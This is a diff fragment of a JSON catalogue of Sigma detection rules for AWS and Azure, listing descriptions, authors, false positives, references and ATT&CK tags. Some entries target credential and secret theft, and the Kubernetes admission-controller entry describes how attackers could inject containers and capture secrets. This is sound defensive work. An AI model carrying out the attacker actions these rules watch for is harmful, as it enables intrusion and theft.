+ "level": "high", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_config_disable_recording.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "07330162-dba1-4746-8121-a9647d49d297", + "value": "AWS Config Disabling Channel/Recorder" + }, + { + "description": "Detects when an ElastiCache security group has been created.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/07/24", + "falsepositive": [ + "A ElastiCache security group may be created by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Security group creations from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "aws_elasticache_security_group_created.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://github.com/elastic/detection-rules/blob/598f3d7e0a63221c0703ad9a0ea7e22e7bc5961e/rules/integrations/aws/persistence_elasticache_security_group_creation.toml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_elasticache_security_group_created.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1136", + "attack.t1136.003" + ] + }, + "uuid": "4ae68615-866f-4304-b24b-ba048dfa5ca7", + "value": "AWS ElastiCache Security Group Created" + }, + { + "description": "Alert on when legecy authentication has been used on an account", + "meta": { + "author": "Yochana Henderson, '@Yochana-H'", + "creation_date": "2022/06/17", + "falsepositive": [ + "User has been put in acception group so they can use legacy authentication" + ], + "filename": "azure_legacy_authentication_protocols.yml", + "level": "high", + "logsource.category": "No established 
category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-privileged-accounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_legacy_authentication_protocols.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1212" + ] + }, + "uuid": "60f6535a-760f-42a9-be3f-c9a0a025906e", + "value": "Use of Legacy Authentication Protocols" + }, + { + "description": "Detects when an end user consents to an application", + "meta": { + "author": "Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'", + "creation_date": "2022/07/28", + "falsepositive": [ + "Unknown" + ], + "filename": "azure_app_end_user_consent.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#end-user-consent", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_end_user_consent.yml" + ], + "tags": [ + "attack.privilege_escalation" + ] + }, + "uuid": "9b2cc4c4-2ad4-416d-8e8e-ee6aa6f5035a", + "value": "End User Consent" + }, + { + "description": "Define a baseline threshold for failed sign-ins due to Conditional Access failures", + "meta": { + "author": "Yochana Henderson, '@Yochana-H'", + "creation_date": "2022/06/01", + "falsepositive": [ + "Service Account misconfigured", + "Misconfigured Systems", + "Vulnerability Scanners" + ], + "filename": "azure_conditional_access_failure.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-privileged-accounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_conditional_access_failure.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1110" + ] + }, + 
"uuid": "b4a6d707-9430-4f5f-af68-0337f52d5c42", + "value": "Sign-in Failure Due to Conditional Access Requirements Not Met" + }, + { + "description": "Detects when an app is assigned Azure AD roles, such as global adminsitrator, or Azure RBAC roles, such as subscription owner.", + "meta": { + "author": "Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'", + "creation_date": "2022/07/19", + "falsepositive": [ + "When the permission is legitimately needed for the app" + ], + "filename": "azure_app_role_added.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#service-principal-assigned-to-a-role", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_role_added.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "b04934b2-0a68-4845-8a19-bdfed3a68a7a", + "value": "App Role Added" + }, + { + "description": "Resource owner password credentials (ROPC) should be avoided if at all possible as this requires the user to expose their current password credentials to the application directly.\nThe application then uses those credentials to authenticate the user against the identity provider.\n", + "meta": { + "author": "Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'", + "creation_date": "2022/06/01", + "falsepositive": [ + "Applications that are being used as part of automated testing or a legacy application that cannot use any other modern authentication flow" + ], + "filename": "azure_app_ropc_authentication.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-authentication-flows", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_ropc_authentication.yml" + ], + "tags": [ + "attack.t1078", + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.initial_access" + ] + }, + "uuid": "55695bc0-c8cf-461f-a379-2535f563c854", + "value": "Applications That Are Using ROPC Authentication Flow" + }, + { + "description": "Change to authentication method could be an indicated of an attacker adding an auth method to the account so they can have continued access.", + "meta": { + "author": "AlertIQ", + "creation_date": "2021/10/10", + "falsepositive": [ + "Unknown" + ], + "filename": "azure_change_to_authentication_method.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_change_to_authentication_method.yml" + ], + "tags": [ + "attack.credential_access" + ] + }, + "uuid": "4d78a000-ab52-4564-88a5-7ab5242b20c7", + "value": "Change to Authentication Method" + }, + { + "description": "Detects when a user that doesn't have permissions to invite a guest user attempts to invite one.", + "meta": { + "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'", + "creation_date": "2022/08/10", + "falsepositive": [ + "A non malicious user is unaware of the proper process" + ], + "filename": "azure_guest_invite_failure.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#things-to-monitor", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_guest_invite_failure.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + 
"attack.t1078" + ] + }, + "uuid": "0b4b72e3-4c53-4d5b-b198-2c58cfef39a9", + "value": "Guest User Invited By Non Approved Inviters" + }, + { + "description": "Identifies when a service principal is created in Azure.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/09/02", + "falsepositive": [ + "Service principal being created may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Service principal created from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "azure_service_principal_created.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#application-proxy", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_service_principal_created.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "0ddcff6d-d262-40b0-804b-80eb592de8e3", + "value": "Azure Service Principal Created" + }, + { + "description": "Identifies when a key vault is modified or deleted.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/16", + "falsepositive": [ + "Key Vault being modified or deleted may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Key Vault modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "filename": "azure_keyvault_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_keyvault_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact", + "attack.credential_access", + "attack.t1552", + "attack.t1552.001" + ] + }, + "uuid": "459a2970-bb84-4e6a-a32e-ff0fbd99448d", + "value": "Azure Key Vault Modified or Deleted" + }, + { + "description": "Detect access has been blocked by Conditional Access policies.\nThe access policy does not allow token issuance which might be sights≈ of unauthorizeed login to valid accounts.\n", + "meta": { + "author": "AlertIQ", + "creation_date": "2021/10/10", + "falsepositive": [ + "Unknown" + ], + "filename": "azure_user_login_blocked_by_conditional_access.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_user_login_blocked_by_conditional_access.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1110" + ] + }, + "uuid": "9a60e676-26ac-44c3-814b-0c2a8b977adf", + "value": "User Access Blocked by Azure Conditional Access" + }, + { + "description": "Detects when a temporary access pass (TAP) is added to an account. 
TAPs added to priv accounts should be investigated", + "meta": { + "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'", + "creation_date": "2022/08/10", + "falsepositive": [ + "Administrator adding a legitmate temporary access pass" + ], + "filename": "azure_tap_added.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#changes-to-privileged-accounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_tap_added.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1078" + ] + }, + "uuid": "fa84aaf5-8142-43cd-9ec2-78cfebf878ce", + "value": "Temporary Access Pass Added To An Account" + }, + { + "description": "Detects when a user has been elevated to manage all Azure Subscriptions.\nThis change should be investigated immediately if it isn't planned.\nThis setting could allow an attacker access to Azure subscriptions in your environment.\n", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/11/26", + "falsepositive": [ + "If this was approved by System Administrator." 
+ ], + "filename": "azure_subscription_permissions_elevation_via_auditlogs.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#assignment-and-elevation", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_subscription_permissions_elevation_via_auditlogs.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1078" + ] + }, + "uuid": "ca9bf243-465e-494a-9e54-bf9fc239057d", + "value": "Azure Subscription Permission Elevation Via AuditLogs" + }, + { + "description": "Detects when an account was created and deleted in a short period of time.", + "meta": { + "author": "Mark Morowczynski '@markmorow', MikeDuddington, '@dudders1', Tim Shelton", + "creation_date": "2022/08/11", + "falsepositive": [ + "Legit administrative action" + ], + "filename": "azure_ad_account_created_deleted.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-user-accounts#short-lived-accounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_account_created_deleted.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1078" + ] + }, + "uuid": "6f583da0-3a90-4566-a4ed-83c09fe18bbf", + "value": "Account Created And Deleted Within A Close Time Frame" + }, + { + "description": "Identifies when Rule Collections (Application, NAT, and Network) is being modified or deleted.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/08", + "falsepositive": [ + "Rule Collections (Application, NAT, and Network) being modified or deleted may be performed by a system administrator. 
Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Rule Collections (Application, NAT, and Network) modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "azure_firewall_rule_collection_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_firewall_rule_collection_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "025c9fe7-db72-49f9-af0d-31341dd7dd57", + "value": "Azure Firewall Rule Collection Modified or Deleted" + }, + { + "description": "Identifies when an admission controller is executed in Azure Kubernetes.\nA Kubernetes Admission controller intercepts, and possibly modifies, requests to the Kubernetes API server.\nThe behavior of this admission controller is determined by an admission webhook (MutatingAdmissionWebhook or ValidatingAdmissionWebhook) that the user deploys in the cluster.\nAn adversary can use such webhooks as the MutatingAdmissionWebhook for obtaining persistence in the cluster.\nFor example, attackers can intercept and modify the pod creation operations in the cluster and add their malicious container to every created pod.\nAn adversary can use the webhook ValidatingAdmissionWebhook, which could be used to obtain access credentials.\nAn adversary could use the webhook to intercept the requests to the API server, record secrets, and other sensitive information.\n", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/11/25", + "falsepositive": [ + "Azure Kubernetes Admissions Controller may be done by a system administrator.", + "If known behavior is causing false 
positives, it can be exempted from the rule." + ], + "filename": "azure_kubernetes_admission_controller.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_admission_controller.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1078", + "attack.credential_access", + "attack.t1552", + "attack.t1552.007" + ] + }, + "uuid": "a61a3c56-4ce2-4351-a079-88ae4cbd2b58", + "value": "Azure Kubernetes Admission Controller" + }, + { + "description": "Identifies IPs from which users grant access to other users on azure resources and alerts when a previously unseen source IP address is used.", + "meta": { + "author": "sawwinnnaung", + "creation_date": "2020/05/07", + "falsepositive": [ + "Valid change" + ], + "filename": "azure_rare_operations.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://github.com/Azure/Azure-Sentinel/blob/e534407884b1ec5371efc9f76ead282176c9e8bb/Detections/AzureActivity/RareOperations.yaml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_rare_operations.yml" + ], + "tags": [ + "attack.t1003" + ] + }, + "uuid": "c1182e02-49a3-481c-b3de-0fadc4091488", + "value": "Rare Subscription-level Operations In Azure" + }, + { + "description": "Detects when sign-ins increased by 10% or greater.", + "meta": { + "author": "Mark Morowczynski '@markmorow', MikeDuddington, '@dudders1'", + "creation_date": "2022/08/11", + "falsepositive": [ + "Unlikely" + ], + "filename": "azure_ad_auth_failure_increase.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + 
"https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-user-accounts#monitoring-for-failed-unusual-sign-ins", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_auth_failure_increase.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1078" + ] + }, + "uuid": "e1d02b53-c03c-4948-b11d-4d00cca49d03", + "value": "Increased Failed Authentications Of Any Type" + }, + { + "description": "Monitor and alert for Bitlocker key retrieval.", + "meta": { + "author": "Michael Epping, '@mepples21'", + "creation_date": "2022/06/28", + "falsepositive": [ + "Unknown" + ], + "filename": "azure_ad_bitlocker_key_retrieval.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#bitlocker-key-retrieval", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_bitlocker_key_retrieval.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1078" + ] + }, + "uuid": "a0413867-daf3-43dd-9245-734b3a787942", + "value": "Bitlocker Key Retrieval" + }, + { + "description": "Detects when a new owner is added to an application. 
This gives that account privileges to make modifications and configuration changes to the application.", + "meta": { + "author": "Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'", + "creation_date": "2022/06/02", + "falsepositive": [ + "When a new application owner is added by an administrator" + ], + "filename": "azure_app_owner_added.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#new-owner", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_owner_added.yml" + ], + "tags": [ + "attack.t1528", + "attack.persistence", + "attack.credential_access", + "attack.defense_evasion" + ] + }, + "uuid": "74298991-9fc4-460e-a92e-511aa60baec1", + "value": "Added Owner To Application" + }, + { + "description": "Identifies when a application gateway is modified or deleted.", + "meta": { + "author": "Austin Songer", + "creation_date": "2021/08/16", + "falsepositive": [ + "Application gateway being modified or deleted may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Application gateway modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "filename": "azure_application_gateway_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_application_gateway_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "ad87d14e-7599-4633-ba81-aeb60cfe8cd6", + "value": "Azure Application Gateway Modified or Deleted" + }, + { + "description": "Detect when a user has reset their password in Azure AD", + "meta": { + "author": "YochanaHenderson, '@Yochana-H'", + "creation_date": "2022/08/03", + "falsepositive": [ + "If this was approved by System Administrator or confirmed user action." + ], + "filename": "azure_user_password_change.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_user_password_change.yml" + ], + "tags": [ + "attack.t1078" + ] + }, + "uuid": "340ee172-4b67-4fb4-832f-f961bdc1f3aa", + "value": "Password Reset By User Account" + }, + { + "description": "Monitor and alert on group membership additions of groups that have CA policy modification access", + "meta": { + "author": "Mark Morowczynski '@markmorow', Thomas Detzner '@tdetzner'", + "creation_date": "2022/08/04", + "falsepositive": [ + "User removed from the group is approved" + ], + "filename": "azure_group_user_addition_ca_modification.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-infrastructure#conditional-access", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_group_user_addition_ca_modification.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1098" + ] + }, + "uuid": "91c95675-1f27-46d0-bead-d1ae96b97cd3", + "value": "User Added To Group With CA Policy Modification Access" + }, + { + "description": "Detect when users in your Azure AD tenant are authenticating to other Azure AD Tenants.", + "meta": { + "author": "MikeDuddington, '@dudders1'", + "creation_date": "2022/06/30", + "falsepositive": [ + "If this was approved by System Administrator." + ], + "filename": "azure_users_authenticating_to_other_azure_ad_tenants.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts#monitoring-external-user-sign-ins", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_users_authenticating_to_other_azure_ad_tenants.yml" + ], + "tags": [ + "attack.t1078" + ] + }, + "uuid": "5f521e4b-0105-4b72-845b-2198a54487b9", + "value": "Users Authenticating To Other Azure AD Tenants" + }, + { + "description": "Identifies when an user or application modified the federation settings on the domain.", + "meta": { + "author": "Austin Songer", + "creation_date": "2021/09/06", + "falsepositive": [ + "Federation Settings being modified or deleted may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Federation Settings modified from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "filename": "azure_federation_modified.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-monitor-federation-changes", + "https://attack.mitre.org/techniques/T1078", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_federation_modified.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1078" + ] + }, + "uuid": "352a54e1-74ba-4929-9d47-8193d67aba1e", + "value": "Azure Domain Federation Settings Modified" + }, + { + "description": "Identifies when a application security group is modified or deleted.", + "meta": { + "author": "Austin Songer", + "creation_date": "2021/08/16", + "falsepositive": [ + "Application security group being modified or deleted may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Application security group modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "filename": "azure_application_security_group_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_application_security_group_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "835747f1-9329-40b5-9cc3-97d465754ce6", + "value": "Azure Application Security Group Modified or Deleted" + }, + { + "description": "Detect when authentications to important application(s) only required single-factor authentication", + "meta": { + "author": "MikeDuddington, '@dudders1'", + "creation_date": "2022/07/28", + "falsepositive": [ + "If this was approved by System Administrator." + ], + "filename": "azure_ad_auth_to_important_apps_using_single_factor_auth.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_auth_to_important_apps_using_single_factor_auth.yml" + ], + "tags": [ + "attack.t1078" + ] + }, + "uuid": "f272fb46-25f2-422c-b667-45837994980f", + "value": "Authentications To Important Apps Using Single Factor Authentication" + }, + { + "description": "Identifies the deletion of Azure Kubernetes Pods.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/07/24", + "falsepositive": [ + "Pods may be deleted by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Pods deletions from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "filename": "azure_kubernetes_pods_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", + "https://github.com/elastic/detection-rules/blob/065bf48a9987cd8bd826c098a30ce36e6868ee46/rules/integrations/azure/impact_kubernetes_pod_deleted.toml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_pods_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "b02f9591-12c3-4965-986a-88028629b2e1", + "value": "Azure Kubernetes Pods Deleted" + }, + { + "description": "Detects when a new credential is added to an existing application. Any additional credentials added outside of expected processes could be a malicious actor using those credentials.", + "meta": { + "author": "Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'", + "creation_date": "2022/05/26", + "falsepositive": [ + "When credentials are added/removed as part of the normal working hours/workflows" + ], + "filename": "azure_app_credential_added.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-credentials", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_credential_added.yml" + ], + "tags": [ + "attack.t1098", + "attack.persistence" + ] + }, + "uuid": "cbb67ecc-fb70-4467-9350-c910bdf7c628", + "value": "Added Credentials to Existing Application" + }, + { + "description": "Identifies when a device or device configuration in azure is modified or deleted.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/09/03", + "falsepositive": [ + "Device or device configuration being modified or deleted may be performed by a system 
administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Device or device configuration modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "azure_device_or_configuration_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#core-directory", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_device_or_configuration_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "46530378-f9db-4af9-a9e5-889c177d3881", + "value": "Azure Device or Configuration Modified or Deleted" + }, + { + "description": "Identifies when a application is deleted in Azure.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/09/03", + "falsepositive": [ + "Application being deleted may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Application deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "filename": "azure_application_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#application-proxy", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_application_deleted.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "410d2a41-1e6d-452f-85e5-abdd8257a823", + "value": "Azure Application Deleted" + }, + { + "description": "Define a baseline threshold and then monitor and adjust to suit your organizational behaviors and limit false alerts from being generated.", + "meta": { + "author": "Corissa Koopmans, '@corissalea'", + "creation_date": "2022/04/21", + "falsepositive": [ + "Failed Azure AD Connect Synchronization", + "Service account use with an incorrect password specified", + "Misconfigured systems", + "Vulnerability scanners" + ], + "filename": "azure_aad_secops_signin_failure_bad_password_threshold.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#things-to-monitor", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_aad_secops_signin_failure_bad_password_threshold.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1110" + ] + }, + "uuid": "dff74231-dbed-42ab-ba49-83289be2ac3a", + "value": "Sign-in Failure Bad Password Threshold" + }, + { + "description": "Detects when a user has been elevated to manage all Azure Subscriptions.\nThis change should be investigated immediately if it isn't planned.\nThis setting could allow an attacker access to Azure subscriptions in your environment.\n", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/11/26", + "falsepositive": [ + "If this was approved by 
System Administrator." + ], + "filename": "azure_subscription_permissions_elevation_via_activitylogs.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftauthorization", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_subscription_permissions_elevation_via_activitylogs.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1078" + ] + }, + "uuid": "09438caa-07b1-4870-8405-1dbafe3dad95", + "value": "Azure Subscription Permission Elevation Via ActivityLogs" + }, + { + "description": "Identifies when a Firewall Rule Configuration is Modified or Deleted.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/08", + "falsepositive": [ + "Firewall Rule Configuration being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Firewall Rule Configuration modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "filename": "azure_network_firewall_rule_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_network_firewall_rule_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "2a7d64cf-81fa-4daf-ab1b-ab80b789c067", + "value": "Azure Firewall Rule Configuration Modified or Deleted" + }, + { + "description": "Detects when a Azure Kubernetes Cluster is created or deleted.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/07", + "falsepositive": [ + "Kubernetes cluster being created or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Kubernetes cluster created or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
